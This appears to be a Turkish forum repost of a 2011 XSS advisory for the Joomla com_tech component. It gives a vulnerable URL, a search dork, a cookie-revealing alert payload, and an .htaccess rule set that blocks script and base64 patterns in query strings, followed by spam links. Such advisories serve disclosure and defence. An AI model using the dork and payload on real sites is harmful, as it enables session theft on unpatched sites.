Joomla Component(com_tech) ~ XSS Vuln.

endLesS

Webmaster
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################

# Author : [qrusher-] ~ Bug Researchers

# Date : 07.08.2011

# Name : Joomla com_tech

# Bug Type : XSS

# Infection : Bilgi erişimi sağlanılabilir.

# Example Vuln :

[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]

[+] Dork:inurl: com_foto

[+] Demo: http://site/index.php?option=com_tech&task=

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

>**********alert(document.cookie)</script> // Post Search Box

< -- bug code end of -- >


< ------------------- header data end of ------------------- >


Pek çok alternatif mevcut ama .htaccess dosyasını biraz düzenlersek sorun ortadan kalacaktır.


< -- bug code start -- >


.htaccess Dosyasının içine aşşağıdaki kodu yazın ve böylece sitenize yapılan herhangi bir XSS
saldırısında siteniz hata verecektir.

RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]


< -- bug code end of -- >
 
bayigram takipçi satın al instagram beğeni satın al instagram takipçi satın al tiktok takipçi satın al Buy Followers haber
vozol puff
Geri
Üst